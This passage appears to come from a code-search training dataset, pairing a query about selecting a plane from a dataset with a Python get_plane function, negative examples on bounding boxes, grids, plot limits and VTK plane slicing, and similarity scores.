draw_line=False):\n\n # make the mini-batch of images into a grid\n # nmaps = tensor.size(0)\n nmaps = len(box)\n xmaps = min(nrow, nmaps)\n ymaps = int(math.ceil(float(nmaps) / xmaps))\n # height, width = int(tensor.size(2) + padding), int(tensor.size(3) + padding)\n height, width = int(256 + padding), int(256 + padding)\n tensor = torch.ones(())\n grid = tensor.new_full((3, height * ymaps + padding, width * xmaps + padding), pad_value)\n # # add the white image into the grid\n # block = tensor.new_full((3, height - padding, width - padding), 9.0/13)\n k = 0\n for y in irange(ymaps):\n for x in irange(xmaps):\n if k >= nmaps:\n break\n # add the white image into the grid\n block = tensor.new_full((3, height - padding, width - padding), 9.0/13)\n # print(box[0].size())\n # print(box[1].size())\n # assert False\n # num_curr_box = box[0][k].size(0)\n num_curr_box = box[k][0].size(0)\n for z in irange(num_curr_box):\n # label = box[1][k][z].item()\n try:\n label = box[k][1][z].item()\n except:\n print(box)\n print(k)\n assert False\n \n if label != -1:\n block = draw_box(block, box[k][0][z], label, draw_line)\n # print(k, z)\n else:\n break\n # copy to the grid\n grid.narrow(1, y 
* height + padding, height - padding)\\\n .narrow(2, x * width + padding, width - padding)\\\n .copy_(block)\n k = k + 1\n return grid", "def map_grid_loc_to_pixel((grid, x, y), panel_dimensions = bm_panel_dimensions, xc = 17.25, yc = 630, run = 17.25):\n x_offset = 0\n for panel_index, panel_dim in panel_dimensions.iteritems():\n if panel_index < grid:\n width, height = panel_dim\n x_offset += width*xc\n xp, yp = xc + x*run + x_offset, yc - y*run\n return (xp, yp)", "def GetNiceExtentsBySpacing(minval,maxval,spacing,tolerance):\n pass", "def limits(self):\n\n\t\treturn [\n\t\t\tmin(self.xvalues),\n\t\t\tmax(self.xvalues),\n\t\t\tmin(self.yvalues),\n\t\t\tmax(self.yvalues)]", "def bounds(lines):\n min_x = bench_util.Max\n min_y = bench_util.Max\n max_x = bench_util.Min\n max_y = bench_util.Min\n \n for line in lines.itervalues():\n for x, y in line:\n min_x = min(min_x, x)\n min_y = min(min_y, y)\n max_x = max(max_x, x)\n max_y = max(max_y, y)\n \n return ((min_x, min_y), (max_x, max_y))", "def get_roi_limits(self):\n wdet,hdet=self.get_detector_size()\n hlims,vlims=self._get_roi_limits()\n hbin,vbin=self._truncate_roi_binning(wdet,hdet)\n min_roi=(0,0,hlims[0],vlims[0],1,1)\n max_roi=(wdet-hlims[0],wdet-vlims[0],wdet,hdet,hbin,vbin)\n return (min_roi,max_roi)", "def fudgePlotLimits(x,y,marfrac=0.1):\n xl = np.min(x); yl = np.min(y)\n xh = np.max(x); yh = np.max(y)\n dx = xh-xl; dy = yh-yl\n plt.xlim(xl-dx*marfrac,xh+dx*marfrac)\n plt.ylim(yl-dy*marfrac,yh+dy*marfrac)", "def pad(self, nxp, nyp):\n assert (nxp > self.nx)\n assert (nyp > self.ny)\n assert (np.mod(nxp - self.nx, 2) == 0)\n assert (np.mod(nyp - self.ny, 2) == 0)\n\n ret = rmap(nx=nxp, dx=self.dx, ny=nyp, dy=self.dy)\n ret.map[(nyp - self.ny) / 2:(nyp + self.ny) / 2, (nxp - self.nx) / 2:(\n nxp + self.nx) / 2] = self.map\n return ret", "def extend_to_grid(self, resolution):\n return Bounds(\n min_value = math.floor(self.min/resolution)*resolution,\n max_value = math.ceil(self.max/resolution)*resolution\n )", "def center_crop2fixed_pad(im, masks, mask, boxes, classes, target_width, target_height, min_size=2):\n\n h, w, c = im.shape\n ir, tr = float(h) / w, float(target_height) / target_width\n if ir > tr:\n borderw, borderh = int((h / tr - w) / 2), 0\n else:\n borderh, borderw = int((w * tr - h) / 2), 0\n\n im = cv2.copyMakeBorder(im, borderh, borderh, borderw, borderw, cv2.BORDER_CONSTANT, value=[103, 116, 123])\n mask = cv2.copyMakeBorder(mask, borderh, borderh, borderw, borderw, cv2.BORDER_CONSTANT, value=[0])\n n = masks.shape[0]\n if n > 1:\n masks = [cv2.copyMakeBorder(m, borderh, borderh, borderw, borderw, cv2.BORDER_CONSTANT, value=[0]) for m in masks]\n masks = np.asarray(masks)\n elif n == 1:\n masks = cv2.copyMakeBorder(masks.reshape([h, w]), borderh, borderh, borderw, borderw, cv2.BORDER_CONSTANT, value=[0])\n masks = masks[np.newaxis, :, :]\n\n boxes[:, 0] = boxes[:, 0] + borderw\n boxes[:, 1] = boxes[:, 1] + borderh\n boxes[:, 2] = boxes[:, 2] + borderw\n boxes[:, 3] = boxes[:, 3] + borderh\n\n scale = float(target_height) / im.shape[0]\n im = cv2.resize(im, (target_width, target_height))\n mask = cv2.resize(mask, (target_width, target_height), interpolation=cv2.INTER_NEAREST)\n\n flip = np.random.uniform() > 0.5\n if flip:\n im = cv2.flip(im, 1)\n mask = cv2.flip(mask, 1)\n\n if masks.size > 0:\n masks = np.transpose(masks, (1, 2, 0)) # to (h, w, n)\n masks = cv2.resize(masks, (target_width, target_height), interpolation=cv2.INTER_NEAREST)\n if flip:\n masks = cv2.flip(masks, 1)\n try:\n if masks.ndim > 2:\n masks 
= np.transpose(masks, (2, 0, 1)) # to (n, h, w)\n else:\n masks = masks.reshape((1, target_height, target_width))\n except ValueError:\n print (masks.ndim, masks.shape)\n raise\n else:\n masks = np.zeros((0, target_height, target_width), masks.dtype)\n\n # bboxes\n boxes = _offset_boxes(boxes, [target_height, target_width], scale, [0, 0], flip)\n boxes, classes, masks = _filter_invalid_boxes(boxes, classes, masks, min_size=min_size)\n return im, masks, mask, boxes, classes", "def decision_boundary(self, w, min_x, max_x):\n if np.size(w) < 3:\n w = np.append(w, np.zeros(1))\n x = np.array([min_x, max_x])\n y = -1 * ((w[0] * x) - w[2]) / w[1]\n return x, y", "def compute_bounds(self, space):\n bounds = np.zeros((len(space), 2))\n\n for idx, param in enumerate(space):\n\n if TYPE[param[\"type\"]] is TYPE.FLOAT or \\\n TYPE[param[\"type\"]] is TYPE.INTEGER:\n bounds[idx] = (param[\"min\"], param[\"max\"])\n\n elif TYPE[param[\"type\"]] is TYPE.DISCRETE or \\\n TYPE[param[\"type\"]] is TYPE.DISCRETE:\n bounds[idx] = (0, len(param['values']))\n\n return bounds", "def get_bounding_box(img):\n rows = np.any(img, axis=1)\n cols = np.any(img, axis=0)\n rmin, rmax = np.where(rows)[0][[0, -1]]\n cmin, cmax = np.where(cols)[0][[0, -1]]\n # due to python indexing, need to add 1 to max\n # else accessing will be 1px in the box, not out\n rmax += 1\n cmax += 1\n return [rmin, rmax, cmin, cmax]", "def test_calc_bbox():\n with xr.open_rasterio(TEST_RASTER_PATH) as src:\n xr_res = ds.utils.calc_res(src)\n xr_bounds = ds.utils.calc_bbox(src.x.values, src.y.values, xr_res)\n with rasterio.open(TEST_RASTER_PATH) as src:\n rio_bounds = src.bounds\n assert np.allclose(xr_bounds, rio_bounds, atol=1.0) # allow for absolute diff of 1.0", "def _xywh2cs(self, x, y, w, h, padding=1.25):\n aspect_ratio = self.ann_info['image_size'][0] / self.ann_info[\n 'image_size'][1]\n center = np.array([x + w * 0.5, y + h * 0.5], dtype=np.float32)\n\n if (not self.test_mode) and np.random.rand() < 0.3:\n center += 0.4 * (np.random.rand(2) - 0.5) * [w, h]\n\n if w > aspect_ratio * h:\n h = w * 1.0 / aspect_ratio\n elif w < aspect_ratio * h:\n w = h * aspect_ratio\n\n # pixel std is 200.0\n scale = np.array([w / 200.0, h / 200.0], dtype=np.float32)\n # padding to include proper amount of context\n scale = scale * padding\n\n return center, scale", "def crop(self, xdiv, ydiv, img, bBoxes=None):\n xstride = img.shape[1] // xdiv\n ystride = img.shape[0] // ydiv\n\n widthLimits = np.zeros((xdiv+1,), dtype=np.int32)\n heightLimits = np.zeros((ydiv+1), dtype=np.int32)\n croppedImages = [[] for _ in range(xdiv*ydiv)]\n croppedBoxes = [[] for _ in range(xdiv*ydiv)]\n index = 0\n for x in range(0, img.shape[1]+1, xstride):\n widthLimits[index] = x\n index += 1\n index = 0\n for y in range(0, img.shape[0]+1, ystride):\n heightLimits[index] = y\n index+=1\n index = 0\n for i in range(len(widthLimits)-1):\n for j in range(len(heightLimits)-1):\n croppedImages[index] = img[heightLimits[j]:heightLimits[j+1], widthLimits[i]:widthLimits[i+1]]\n index += 1\n if bBoxes:\n for box in bBoxes:\n index = 0\n for i in range(len(widthLimits)-1):\n for j in range(len(heightLimits)-1):\n if box[0] >= widthLimits[i] and box[2] < widthLimits[i+1] \\\n and box[1] >= heightLimits[j] and box[3] < heightLimits[j+1]:\n box[0] -= widthLimits[i]\n box[2] -= widthLimits[i]\n box[1] -= heightLimits[j]\n box[3] -= heightLimits[j]\n croppedBoxes[index].append(box)\n index += 1\n return croppedImages, croppedBoxes", "def clip_range(x, xlim):\n return min([max([x, xlim[0]]), 
xlim[1]])", "def mgrid_box(X,axis=0,linj=200j,marg_rate=0.1):\n\n if len(X.shape)!=2:\n raise Exception('Only 2-D array is acceptable!')\n\n o_axis=1-axis\n\n X_max=np.max(X,axis=axis)\n X_min=np.min(X,axis=axis)\n lenX=X_max-X_min\n Marg_X=marg_rate*lenX\n X_edgmin, X_edgmax = X_min - Marg_X, X_max + Marg_X\n\n num=np.size(X,axis=o_axis)\n\n slices=[slice(X_edgmin[i],X_edgmax[i],linj) for i in np.arange(num)]\n zz=np.mgrid[slices] if axis==0 else np.array([i.T for i in np.mgrid[slices]])\n\n return zz", "def boundary(active, objects):\n limit = SIZE[1]\n for obj in objects:\n if active.pos_x == obj.pos_x:\n limit = min(limit, obj.pos_y)\n active.pos_y = limit-active.height\n active.col_d = True", "def check_extent(self):\n if self.lower_left.x > self.upper_right.x:\n dlx = self.lower_left.x\n self.lower_left.x = self.upper_right.x\n self.upper_right.y = dlx\n\n if self.lower_left.y > self.upper_right.y:\n dly = self.lower_left.y\n self.lower_left.y = self.upper_right.y\n self.upper_right.y = dly", "def _align_toplevel_grid(self):\n\n # align origin with nearest multple of 128\n self.mins[0] -= self.mins[0] % 128\n self.mins[1] -= self.mins[1] % 128\n\n width = self.maxs[0] - self.mins[0]\n height = self.maxs[1] - self.mins[1]\n greatest_dim = max(width, height)\n nearest_pow_two = int(2 ** np.ceil(np.log2(greatest_dim)))\n width_adjustment = (nearest_pow_two - width)\n height_adjustment = (nearest_pow_two - height)\n\n self.maxs[0] += width_adjustment\n self.maxs[1] += height_adjustment", "def printLimits():\n print(\"MinX:\",Drawable._minX)\n print(\"MaxX:\",Drawable._maxX)\n print(\"MinY:\",Drawable._minY)\n print(\"MaxY:\",Drawable._maxY)", "def rasterize(con, cellSize=50, xMin=None, yMin=None, xMax=None, yMax=None):\n\n if xMin is None or yMin is None or xMax is None or yMax is None:\n _xMin, _yMin, _xMax, _yMax = con.bounds\n if xMin is None:\n xMin = _xMin\n if yMin is None:\n yMin = _yMin\n if xMax is None:\n xMax = _xMax\n if yMax is None:\n yMax = _yMax\n\n hitXMax = False\n hitYMin = False\n xSlice = 0\n ySlice = 0\n halfCellSize = cellSize / 2.0\n bitmap = []\n\n while not hitYMin:\n bitmap.append([])\n yScan = -(ySlice * cellSize + halfCellSize) + yMax\n if yScan < yMin:\n hitYMin = True\n while not hitXMax:\n xScan = (xSlice * cellSize + halfCellSize) + xMin\n if xScan > xMax:\n hitXMax = True\n test = con.pointInside((xScan, yScan))\n if test:\n bitmap[-1].append(True)\n else:\n bitmap[-1].append(False)\n xSlice = xSlice + 1\n hitXMax = False\n xSlice = 0\n ySlice = ySlice + 1\n\n return bitmap", "def board_bounds(live_coords):\n if not live_coords:\n return False\n min_x = live_coords[0][0]\n max_x = live_coords[0][0]\n min_y = live_coords[0][1]\n max_y = live_coords[0][1]\n for i, j in live_coords:\n if min_x > i:\n min_x = i\n if i > max_x:\n max_x = i\n if min_y > j:\n min_y = j\n if j > max_y:\n max_y = j\n return [[min_x, min_y], [max_x, max_y]]", "def exclude_points(plot_data: PlotData,\n *data_keys: str,\n limits: dict[str, tuple[float, float]] | None,\n padding: float = 0.1) -> None:\n\n if limits is None:\n return\n\n combined_mask = None\n for data_key in data_keys:\n\n if data_key in limits:\n data_limits = limits[data_key]\n\n #Add padding to both sides of the limits\n data_limits = data_limits[0] - padding * (1 + abs(data_limits[0])), data_limits[1] + padding * (\n 1 + abs(data_limits[1]))\n\n mask = plot_data.get_mask(\n lambda x, data_limits=tuple(data_limits): np.logical_and(x > data_limits[0], x < data_limits[1]),\n data_key=data_key)\n\n if combined_mask 
is None:\n combined_mask = mask\n else:\n combined_mask = [x & y for x, y in zip(mask, combined_mask)]\n\n if combined_mask is not None:\n plot_data.mask_data(combined_mask)", "def get_bounds(self):\n return ([self.t_min] * self.dim,[self.t_max] * self.dim)", "def roi_y_offset():\n def r(x):\n return x & 0xFFF\n\n def w(x):\n return min(x, 0xFFF)\n return r, w", "def bbox(img):\n a = np.where(img != 0)\n bbox = np.min(a[0]), np.max(a[0]), np.min(a[1]), np.max(a[1])\n return bbox", "def pad_image(img_path, width, height, pad_type, value=(0, 0, 0)):\n\n\n\n def get_left_right(margin_width):\n if margin_width % 2 == 0:\n left = margin_width // 2\n right = margin_width // 2\n else:\n left = margin_width // 2\n right = margin_width // 2 + 1\n return left, right\n\n def get_top_bottom(margin_height):\n if margin_height % 2 == 0:\n top = margin_height // 2\n bottom = margin_height // 2\n else:\n top = margin_height // 2\n bottom = margin_height // 2 + 1\n return top, bottom\n \n img = cv2.imread(img_path)\n h, w, _ = img.shape\n img_ratio=h/w\n target_ratio=height/width\n margin_width = width - w\n margin_height = height - h\n # if h >= height and w >= width:\n margin_width = abs(margin_width)\n margin_height = abs(margin_height)\n if img_ratio<target_ratio:\n resize_image(img_path, width=width, type='scale')\n img = cv2.imread(img_path)\n _h, _w, _ = img.shape\n # print(\"new h:\",_h)\n # print(\"new w:\",_w)\n # print(\"t w:\",width)\n # print(\"t h:\",height)\n margin_height = height - _h\n top, bottom = get_top_bottom(margin_height)\n # print(top,bottom)\n img = cv2.copyMakeBorder(img, top, bottom, 0, 0, pad_type, value=value)\n\n else:\n resize_image(img_path, height=height, type='scale')\n img = cv2.imread(img_path)\n _h, _w, _ = img.shape\n margin_width = width - _w\n left, right = get_left_right(margin_width)\n img = cv2.copyMakeBorder(img, 0, 0, left, right, pad_type, value=value)\n\n # elif h <= height and w <= width:\n # img = cv2.resize(img, (width, height))\n # elif h >= height:\n # img = cv2.resize(img, (w, height))\n # h, w, _ = img.shape\n # left, right = get_left_right(margin_width)\n # img = cv2.copyMakeBorder(img, 0, 0, left, right, pad_type, value=value)\n # elif w >= width:\n # img = cv2.resize(img, (width, h))\n # h, w, _ = img.shape\n # top, bottom = get_top_bottom(margin_height)\n # img = cv2.copyMakeBorder(img, top, bottom, 0, 0, pad_type, value=value)\n cv2.imwrite(img_path, img)", "def fix_mtcnn_bb(max_y: int, max_x: int, bounding_box: List[int]) -> List[int]:\n x1, y1, dx, dy = bounding_box[:4]\n x2 = x1 + dx\n y2 = y1 + dy\n x1 = max(min(x1, max_x), 0)\n x2 = max(min(x2, max_x), 0)\n y1 = max(min(y1, max_y), 0)\n y2 = max(min(y2, max_y), 0)\n return [x1, y1, x2, y2]", "def square_clip(points, bounds):\n\n # Extact x y coordinates from cloud\n xy = points[[\"x\", \"y\"]]\n\n # Create masks for each axis\n x_in = (xy[\"x\"] >= bounds[0]) & (xy[\"x\"] <= bounds[2])\n y_in = (xy[\"y\"] >= bounds[1]) & (xy[\"y\"] <= bounds[3])\n stack = np.stack((x_in, y_in), axis=1)\n in_clip = np.all(stack, axis=1)\n\n return in_clip", "def render_limits(\n origin: tuple[float, float],\n size_in_inches: tuple[float, float],\n scale: float,\n) -> tuple[float, float, float, float]:\n min_x, min_y = origin\n max_x = min_x + size_in_inches[0] * scale\n max_y = min_y + size_in_inches[1] * scale\n return min_x, min_y, max_x, max_y" ]
[ "0.6500194", "0.6199433", "0.6105291", "0.60281", "0.59161913", "0.5894251", "0.585068", "0.58396924", "0.5810349", "0.5791982", "0.57880354", "0.5763434", "0.57571024", "0.57165116", "0.57111406", "0.5668063", "0.56606424", "0.565698", "0.56563175", "0.5641682", "0.5641682", "0.5638964", "0.56364", "0.56123", "0.55897206", "0.55895275", "0.5585547", "0.55576754", "0.55565083", "0.5540652", "0.5538314", "0.55299735", "0.5501345", "0.54981315", "0.5496357", "0.5494643", "0.54855037", "0.5480638", "0.54775983", "0.5473485", "0.5450655", "0.54462963", "0.54458404", "0.5435265", "0.54277134", "0.5421867", "0.5419986", "0.54100454", "0.53996915", "0.5380869", "0.53791785", "0.5378378", "0.5370269", "0.5349513", "0.5346833", "0.53359467", "0.5329483", "0.5327626", "0.53273755", "0.53272414", "0.5319824", "0.53167164", "0.5314584", "0.530918", "0.5309115", "0.5300062", "0.52999276", "0.52893806", "0.52870494", "0.5280889", "0.527967", "0.5278977", "0.52783126", "0.5277838", "0.52679056", "0.52640015", "0.52589744", "0.5256994", "0.52561224", "0.5255538", "0.5253938", "0.5248723", "0.52470756", "0.52440745", "0.5242262", "0.5232364", "0.5226393", "0.52263784", "0.5221833", "0.5221342", "0.5214343", "0.52119374", "0.5210906", "0.5203702", "0.52037007", "0.51971024", "0.5193768", "0.519165", "0.5182408", "0.5182092" ]
0.7511422
0
Select plane from dataset. Intended for use with e.g. plt.pcolor.
def get_plane(dset, xaxis, yaxis, slices, **kw):\n    # Build quad meshes from sorted grids\n    xgrid = dset.dims[xaxis][0][slices[xaxis]]\n    ygrid = dset.dims[yaxis][0][slices[yaxis]]\n    xorder = np.argsort(xgrid)\n    yorder = np.argsort(ygrid)\n    xmesh, ymesh = quad_mesh(xgrid[xorder], ygrid[yorder], **kw)\n    # Select and arrange data\n    data = dset[slices]\n    if xaxis < yaxis:\n        data = data.T\n    data = data[yorder]\n    data = data[:, xorder]\n    return xmesh, ymesh, data
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def GetPlane(plane):\r\n pass", "def plane(self):\n return plane(self.N, self.o)", "def get_plane(self, scalar, plane, pval):\n\n if plane == 'yz' or plane == 'zy':\n # z along rows, y along columns\n return scalar[:, pval, :]\n elif plane == 'xz' or plane == 'zx':\n # x along columns, z along rows\n return scalar[:, :, pval]\n elif plane == 'xy' or plane == 'yx':\n # x along rows, y along columns\n return scalar[pval, :, :]", "def plane(self):\r\n from lsst.analysis import utils\r\n return utils.fitplane(self.points, self.z)", "def get_plane(self, quantity, plane, pval):\n\n self.log.info('Retrieving plane for %s', quantity)\n scalar = self.get_scalar_quantity(quantity)\n if plane == 'yz' or plane == 'zy':\n # z along rows, y along columns\n return scalar[:, pval, :]\n elif plane == 'xz' or plane == 'zx':\n # x along columns, z along rows\n return scalar[:, :, pval]\n elif plane == 'xy' or plane == 'yx':\n # x along rows, y along columns\n return scalar[pval, :, :]", "def mesh_slicer(self, plane, opt):\n\n # get plane coefficients\n a = plane[0]\n b = plane[1]\n c = plane[2]\n\n # create vtk plane object\n VTKplane = vtk.vtkPlane()\n # for now we choose the center point as the point of rotation\n VTKplane.SetOrigin(self.mesh_poly.GetCenter())\n VTKplane.SetNormal(a, b, c)\n VTKplane.SetOrigin(self.epi_apex_node)\n\n # create cutter\n cutEdges = vtk.vtkCutter()\n cutEdges.SetInputData(self.mesh_poly)\n cutEdges.SetCutFunction(VTKplane)\n cutEdges.GenerateCutScalarsOn()\n cutEdges.SetValue(0, 0.5)\n\n # create renderer\n ren = vtk.vtkRenderer()\n ren.SetBackground(0.0, 0.0, 0.0)\n\n # create mapper\n mapper = vtk.vtkPolyDataMapper()\n mapper.SetInputConnection(cutEdges.GetOutputPort())\n\n # create actor\n actor = vtk.vtkActor()\n actor.SetMapper(mapper)\n actor.GetProperty().SetColor(0.0, 0.0, 1.0)\n actor.GetProperty().SetLineWidth(2)\n\n # display apex point\n apexA = include_points(list(self.epi_apex_node), 1, 15, (0, 0, 1))\n\n if (opt == 'mesh'):\n meshMapper = vtk.vtkPolyDataMapper()\n meshMapper.SetInputData(self.mesh_poly)\n meshActor = vtk.vtkActor()\n meshActor.SetMapper(meshMapper)\n meshActor.GetProperty().SetColor(1.0, 0.0, 0.0)\n\n # generate renderer\n ren.AddActor(self.meshActor)\n ren.AddActor(actor)\n ren.AddActor(apexA)\n\n else:\n ren.AddActor(actor)\n ren.AddActor(apexA)\n\n # display\n vtk_show(ren)", "def __setPlaneName(self, data):\n item = self._item()\n if item is not None:\n for name, normal in self._PLANES.items():\n if data == name and normal is not None:\n item.setNormal(normal)", "def load_plane(image):\n pixels = image.getPrimaryPixels()\n return pixels.getPlane(0, 0, 0)", "def SetPlaneMode(self, *args):\n return _ShapeUpgrade.ShapeUpgrade_ShapeConvertToBezier_SetPlaneMode(self, *args)", "def setPlanePickable(self, obj, dictName):\n obj.sim.reparentTo(self.selectable)\n obj.sim.find('**/pPlane1').node().setIntoCollideMask(BitMask32.bit(1))\n obj.sim.find('**/pPlane1').node().setTag(dictName, obj.id)", "def _prepare_plane(self):\n verticies = [\n # main plane - note that the mainplane is scaled so the mat_plane\n # matrix will it transform to the correct coordinates\n -self.i_border[0]/self._scaling[0], self.i_border[1]/self._scaling[1],\n -self.i_border[0]/self._scaling[0], -(self.o_wh[1]-self.i_border[1])/self._scaling[1],\n (self.o_wh[0]-self.i_border[0])/self._scaling[0], -(self.o_wh[1]-self.i_border[1])/self._scaling[1],\n (self.o_wh[0]-self.i_border[0])/self._scaling[0], -(self.o_wh[1]-self.i_border[1])/self._scaling[1],\n 
(self.o_wh[0]-self.i_border[0])/self._scaling[0], self.i_border[1]/self._scaling[1],\n -self.i_border[0]/self._scaling[0], self.i_border[1]/self._scaling[1],\n\n # coord plane\n 0, 0,\n 0, -self.o_wh[1],\n self.o_wh[0], -self.o_wh[1],\n self.o_wh[0], -self.o_wh[1],\n self.o_wh[0], 0,\n 0, 0,\n\n # axes\n 0, -self.o_wh[1], self.o_wh[0], -self.o_wh[1], #x\n 0, 0, 0, -self.o_wh[1], #y\n ]\n\n colors = [\n 1.0, 1.0, 1.0, 1.0, # outer box XXX Remove outer box...\n 1.0, 1.0, 1.0, 1.0,\n 1.0, 1.0, 1.0, 1.0,\n 1.0, 1.0, 1.0, 1.0,\n 1.0, 1.0, 1.0, 1.0,\n 1.0, 1.0, 1.0, 1.0,\n .9, .9, .9, 9.0, # plot box\n .9, .9, .9, 9.0,\n .9, .9, .9, 9.0,\n .9, .9, .9, 9.0,\n .9, .9, .9, 9.0,\n .9, .9, .9, 9.0,\n 0.0, 0.0, 0.0, 1.0, #lines\n 0.0, 0.0, 0.0, 1.0,\n 0.0, 0.0, 0.0, 1.0,\n 0.0, 0.0, 0.0, 1.0,\n ]\n\n self._fonts = []\n for u in range(1, self._unit_count[0]+1):\n verticies.append(self._unit_w[0]*u)\n verticies.append(-self.o_wh[1]+0.02)\n verticies.append(self._unit_w[0]*u)\n verticies.append(-self.o_wh[1]-0.02)\n colors += [0.0, 0.0, 0.0, 1.0]\n colors += [0.0, 0.0, 0.0, 1.0]\n self._fonts.append([\n '{:.2f}'.format(u*(self.i_axis[0]/self._unit_count[0])-self.i_origin[0]),\n (self._unit_w[0]*u+self.i_border[0]-0.05)*self._scaling[0],\n (-self.o_wh[1]+(self.i_border[3])*0.5)\n ])\n for u in range(0, self._unit_count[1]):\n verticies.append(0.02)\n verticies.append(-self._unit_w[1]*u)\n verticies.append(-0.02)\n verticies.append(-self._unit_w[1]*u)\n colors += [0.0, 0.0, 0.0, 1.0]\n colors += [0.0, 0.0, 0.0, 1.0]\n self._fonts.append([\n '{:.2f}'.format(self.i_axis[1]-u*self.i_axis[1]/self._unit_count[1]-self.i_origin[1]),\n (0.025)*self._scaling[0],\n (-(self._unit_w[1])*u-self.i_border[1]+0.01)*self._scaling[1]\n ])\n\n self._draw_plane_indicies = (0, 12)\n self._draw_line_indicies = (12, 4+self._unit_count[0]*2+self._unit_count[1]*2)\n\n # convert data into valid data format\n verticies = numpy.array(verticies, dtype=numpy.float32)\n colors = numpy.array(colors, dtype=numpy.float32)\n\n self._plane_vao = util.VAO()\n self._plane_vbo = util.VBO(2)\n\n with self._plane_vao:\n # plane verticies\n with self._plane_vbo.get(0):\n glBufferData(GL_ARRAY_BUFFER, ArrayDatatype.arrayByteCount(verticies), verticies, GL_STATIC_DRAW)\n glVertexAttribPointer(self.plane_shader.attributeLocation('vertex_position'), 2, GL_FLOAT, GL_FALSE, 0, None)\n glEnableVertexAttribArray(0)\n\n # place vertex colors\n with self._plane_vbo.get(1):\n glBufferData(GL_ARRAY_BUFFER, ArrayDatatype.arrayByteCount(colors), colors, GL_STATIC_DRAW)\n glVertexAttribPointer(self.plane_shader.attributeLocation('vertex_color'), 4, GL_FLOAT, GL_FALSE, 0, None)\n glEnableVertexAttribArray(1)", "def plane(self):\n return Plane(Point(0, self.evaluations.exposedWing.edges[2].point1.y, 0), Vector(0, 1, 0),\n hidden=True)", "def GetPlaneMode(self, *args):\n return _ShapeUpgrade.ShapeUpgrade_ShapeConvertToBezier_GetPlaneMode(self, *args)", "def filter_plane(img_plane):\n img_plane = despeckle_by_opening(img_plane)\n img_plane = pseudo_flatfield(img_plane)\n return img_plane", "def plane_2d(self, quantity, plane, pval, draw=False, fixed=None):\n self.log.info('Plotting plane')\n pval = int(pval)\n # x = np.arange(0, self.period, self.dx)\n # y = np.arange(0, self.period, self.dy)\n # z = np.arange(0, self.height + self.dz, self.dz)\n x = self.X\n y = self.Y\n z = self.Z\n # Get the scalar values\n freq = self.conf['Simulation']['params']['frequency']\n wvlgth = (consts.c / freq) * 1E9\n title = 'Frequency = {:.4E} Hz, Wavelength = {:.2f} nm'.format(\n 
freq, wvlgth)\n # Get the plane we wish to plot\n cs = self.get_plane(quantity, plane, pval)\n self.log.info('DATA SHAPE: %s' % str(cs.shape))\n show = self.conf['General']['show_plots']\n p = False\n sim_dir = os.path.expandvars(self.conf['General']['sim_dir'])\n if plane == 'yz' or plane == 'zy':\n labels = ('y [um]', 'z [um]', quantity, title)\n if self.conf['General']['save_plots']:\n p = os.path.join(sim_dir,\n '%s_plane_2d_yz_pval%s.png' % (quantity,\n str(pval)))\n self.heatmap2d(y, z, cs, labels, plane, pval,\n save_path=p, show=show, draw=draw, fixed=fixed)\n elif plane == 'xz' or plane == 'zx':\n labels = ('x [um]', 'z [um]', quantity, title)\n if self.conf['General']['save_plots']:\n p = os.path.join(sim_dir,\n '%s_plane_2d_xz_pval%s.png' % (quantity,\n str(pval)))\n self.heatmap2d(x, z, cs, labels, plane, pval,\n save_path=p, show=show, draw=draw, fixed=fixed)\n elif plane == 'xy' or plane == 'yx':\n labels = ('y [um]', 'x [um]', quantity, title)\n if self.conf['General']['save_plots']:\n p = os.path.join(sim_dir,\n '%s_plane_2d_xy_pval%s.png' % (quantity,\n str(pval)))\n self.heatmap2d(x, y, cs, labels, plane, pval,\n save_path=p, show=show, draw=draw, fixed=fixed)", "def slice_explorer(data, cmap='gray'):\n data_len = len(data)\n\n @interact(plane=(0, data_len-1), continuous_update=False)\n def display_slice(plane=data_len/2):\n fig, axis = plt.subplots(figsize=(20, 7))\n axis_3d = fig.add_subplot(133, projection='3d')\n show_plane(axis, data[plane], title='Plane {}'.format(plane), cmap=cmap)\n slice_in_3d(axis=axis_3d, shape=data.shape, plane=plane)\n plt.show()\n\n return display_slice", "def p(self):\n return 'Plane'", "def project_point_plane(point, plane):\n base, normal = plane\n normal = normalize_vector(normal)\n vector = subtract_vectors(point, base)\n snormal = scale_vector(normal, dot_vectors(vector, normal))\n return subtract_vectors(point, snormal)", "def PlotAirplane():\n airplane = vtkInterface.PolyData(planefile)\n airplane.Plot()", "def get_projection_point(self, point, plane, test=False):\n return point_on_plane_projection(point, plane, test=test)", "def SetPlaneMode(self, *args):\n return _ShapeUpgrade.ShapeUpgrade_ConvertSurfaceToBezierBasis_SetPlaneMode(self, *args)", "def LoadAirplane():\n return vtkInterface.PolyData(planefile)", "def color_plane_png(plane, color, is_normalized):\n plane = plane.copy()\n cutoff = np.array([200, 200, 200])\n if is_normalized:\n cutoff = cutoff.astype(np.float32) / 255.0\n black_indices = np.all((plane[:, :, :3] <= cutoff), axis=2)\n plane[black_indices, :3] = color\n return plane", "def changeClippingPlane(self):\n dir = gp_Dir(0., 0., 1.)\n checkedButton = self.ui.buttonGroup.checkedButton()\n if checkedButton == self.ui.xRadioButton:\n dir = gp_Dir(1., 0., 0.)\n elif checkedButton == self.ui.yRadioButton:\n dir = gp_Dir(0., 1., 0.)\n elif checkedButton == self.ui.zRadioButton:\n dir = gp_Dir(0., 0., 1.)\n self._surface.UpdateClippingPlane(dir)", "def show_plane(axis, plane, cmap=\"gray\", title=None):\n axis.imshow(plane, cmap=cmap)\n axis.set_xticks([])\n axis.set_yticks([])\n\n if title:\n axis.set_title(title)\n\n return None", "def slice_in_3d(axis, shape, plane):\n Z = np.array([[0, 0, 0],\n [1, 0, 0],\n [1, 1, 0],\n [0, 1, 0],\n [0, 0, 1],\n [1, 0, 1],\n [1, 1, 1],\n [0, 1, 1]])\n\n Z = Z * shape\n\n r = [-1, 1]\n\n X, Y = np.meshgrid(r, r)\n\n # plotting vertices\n axis.scatter3D(Z[:, 0], Z[:, 1], Z[:, 2])\n\n # list of sides' polygons of figure\n verts = [[Z[0], Z[1], Z[2], Z[3]],\n [Z[4], Z[5], Z[6], Z[7]],\n 
